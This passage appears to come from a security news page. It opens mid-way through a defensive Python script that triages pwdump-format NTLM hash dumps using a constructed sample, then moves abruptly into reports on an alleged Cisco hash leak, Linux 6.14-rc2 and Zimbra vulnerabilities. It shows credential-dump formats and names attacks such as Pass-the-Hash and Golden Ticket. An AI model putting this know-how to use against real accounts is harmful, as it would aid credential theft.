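    return [entry for entry in (parse_dump_line(line) for line in text.splitlines()) if entry]


def triage(entries):
    """Group findings a responder acts on: reset order, weak hash formats, shared passwords."""
    findings = defaultdict(list)
    users_by_nt = defaultdict(list)
    for e in entries:
        users_by_nt[e.nt_hash].append(e.user)
        if e.rid == 500:
            findings["builtin_administrator"].append(e.user)   # RID 500 is always the built-in admin
        if e.user.lower() == "krbtgt":
            findings["krbtgt"].append(e.user)                  # reset twice to invalidate forged tickets
        if e.is_machine:
            findings["machine_account"].append(e.user)
        if e.lm_hash != EMPTY_LM_HASH:
            findings["lm_hash_present"].append(e.user)         # LM hashes are crackable in minutes
        if e.nt_hash == EMPTY_PASSWORD_NT_HASH:
            findings["empty_password"].append(e.user)
    for nt_hash, users in users_by_nt.items():
        if len(users) > 1 and nt_hash != EMPTY_PASSWORD_NT_HASH:
            findings["shared_password"].append(sorted(users))  # same NT hash means same password
    return dict(findings)


# Constructed sample in pwdump format; hashes are placeholders, not values from any real dump.
SAMPLE_DUMP = """\
corp.example\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
corp.example\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
corp.example\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
corp.example\\ADC-EXAMPLE-1$:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
corp.example\\alice:1105:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
corp.example\\bob:1106:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
corp.example\\svc_backup:1200:0f0e0d0c0b0a09080706050403020100:99887766554433221100ffeeddccbbaa:::
not a dump line
"""

if __name__ == "__main__":
    for category, accounts in triage(parse_dump(SAMPLE_DUMP)).items():
        print(f"{category}: {accounts}")
```

The shared-password check is the one most often skipped and the one that matters most after a leak: two accounts with the same NT hash fall together the moment either password is recovered, and a service account that reuses an administrator's password turns a low-privilege crack into a domain-level one.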

The exposure of NTLM hashes poses a significant risk, as attackers could crack these hashes to recover passwords and gain unauthorized access to Cisco’s systems.

If privileged account credentials are compromised, attackers could escalate privileges, access critical network resources, and deploy ransomware or other malicious payloads.

The inclusion of domain controller (DC) accounts suggests that attackers may have gained deep network access, allowing for potential lateral movement within the corporate infrastructure.

Cybersecurity experts warn that this could enable further privilege escalation using techniques such as Kerberoasting or Pass-the-Hash attacks.

Additionally, adversaries could establish persistent access through Golden Ticket or Silver Ticket attacks, leading to the exfiltration of sensitive corporate and customer data.

Threat Actor Involvement

Accompanying the leaked dataset is a threatening message from the attackers, indicating that they may have maintained a presence within Cisco’s network for an extended period.

The message suggests a potential intent to return, hinting at an organized cybercrime group or even a nation-state actor.

While Cisco has yet to confirm the breach officially, security professionals urge immediate countermeasures, including:

  • Forced password resets for affected users and service accounts.
  • Disabling NTLM authentication where possible to reduce credential reuse risks.
  • Deploying multi-factor authentication (MFA) to mitigate the impact of credential compromises.
  • Investigating access logs for unauthorized activity and privilege escalation attempts.
  • Enhancing monitoring to detect further attempts at unauthorized access.

This breach highlights the increasing prevalence of credential-based cyberattacks and the urgent need for robust security defenses.

Organizations must remain vigilant against similar threats by enforcing strong authentication policies, monitoring network activity, and implementing proactive cybersecurity measures.

As the investigation continues, cybersecurity experts emphasize the importance of rapid incident response to prevent further damage and safeguard sensitive corporate information from further exploitation.


Linux Kernel 6.14-rc2 Released – What’s Newly Added!


Linus Torvalds, lead developer of the Linux kernel, announced the second release candidate (rc2) of Linux Kernel 6.14, providing developers and enthusiasts with a glimpse at the latest updates and fixes in the kernel’s development cycle.

The announcement was made on the Linux Kernel Mailing List (LKML) on Sunday, February 9, 2025. This release follows the “fairly small” theme of the 6.14 series, with modest but notable updates.

Key Highlights of Linux Kernel 6.14-rc2

Linus described the release as “on the smaller side,” indicative of the kernel’s relatively stable development cycle. However, despite its compact nature, there are several points worth mentioning:

1. s390 KVM Cleanups Dominate the Patch

One of the standout features of 6.14-rc2 is the significant work done on the s390 architecture, particularly regarding Kernel-based Virtual Machine (KVM) cleanups.

Changes related to s390 accounted for about a third of the overall patch, making it the most substantial update in this release candidate.

These changes primarily involved code movement and optimization rather than introducing new features. While s390 updates are not common in other releases, they took center stage this time.

2. Selftests Enhancements

The kernel’s self-testing framework also saw updates. According to Linus, developers made minor fixes that led to the creation of new self-tests.

These developments help ensure the stability and correctness of the kernel as it evolves.

3. Small Fixes Across the Board

Apart from s390 cleanups and self-test updates, the release includes various small fixes across different parts of the kernel.

These minor changes help refine performance, address bugs, and ensure overall system stability without introducing breaking changes.

Linus concluded his announcement with a call to action for developers and testers to try out this release candidate to ensure the changes work as expected.

As with all rc releases, testing by the larger community plays a critical role in discovering edge-case issues or regressions that may not surface during development.

Linux 6.14-rc2 reflects the Linux kernel project’s steady and methodical development approach, with a focus on incremental improvements and stability.

The relatively small nature of this release, coupled with targeted updates, demonstrates the maturity of the Linux kernel.

As always, developers and system administrators are encouraged to participate in testing and contribute feedback during this phase.

Critical Zimbra Flaws Allow Attackers to Gain Unauthorized Access to Sensitive Data


Serious vulnerabilities in Zimbra Collaboration Suite (ZCS), a popular enterprise email and collaboration platform, have raised alarm in the cybersecurity community.

Security researchers have identified several critical flaws that allow attackers to access sensitive data and compromise user accounts.

With millions of businesses relying on Zimbra for email services, these vulnerabilities pose significant risks.

Key Vulnerabilities Disclosed

The newly disclosed vulnerabilities include an array of attack vectors that exploit Zimbra’s web client, SOAP endpoints, and integrated API services. Among the most severe are:

  1. SQL Injection in ZimbraSyncService (CVE-2025-25064)
    A critical flaw in the ZimbraSyncService SOAP endpoint allows attackers to exploit SQL injection vulnerabilities. This could lead to unauthorized data exfiltration or manipulation of backend database records.
  2. SSRF in RSS Feed Parser (CVE-2025-25065)
    A Server-Side Request Forgery (SSRF) vulnerability in Zimbra’s RSS feed parser allows attackers to redirect requests to internal network endpoints. Exploiting this vulnerability could open avenues for lateral movement within corporate networks.
  3. Cross-Site Scripting (XSS) in Classic Web Client (CVE-2024-45516)
    A stored XSS vulnerability in the Zimbra Classic Web Client could enable attackers to inject malicious scripts into user sessions, leading to potential account compromise or unauthorized actions performed on behalf of users.
  4. CSRF in GraphQL Endpoints
    Critical GraphQL API endpoints were found vulnerable to Cross-Site Request Forgery (CSRF) attacks, enabling attackers to perform unauthorized API operations without valid authentication tokens.

These vulnerabilities could lead to a range of critical issues, including data theft, unauthorized account access, and disruption of services.

Enterprises using vulnerable Zimbra versions are particularly at risk as attackers actively exploit such issues to gain access to sensitive corporate information.

Recommended Actions

Zimbra has released patches addressing the vulnerabilities in its latest updates:

  • Zimbra 9.0.0 Patch 44
  • Zimbra 10.0.13 & 10.1.5

Organizations using older versions are urged to upgrade immediately. Failure to do so could leave systems exposed to attack.

The recent vulnerabilities underscore the importance of prompt patch management and robust security practices.

Organizations using Zimbra should act urgently to secure their systems, as attackers often exploit publicly disclosed vulnerabilities before widespread patches are applied.

Regular software updates and an emphasis on proactive threat monitoring remain vital in preventing unauthorized access to sensitive data.
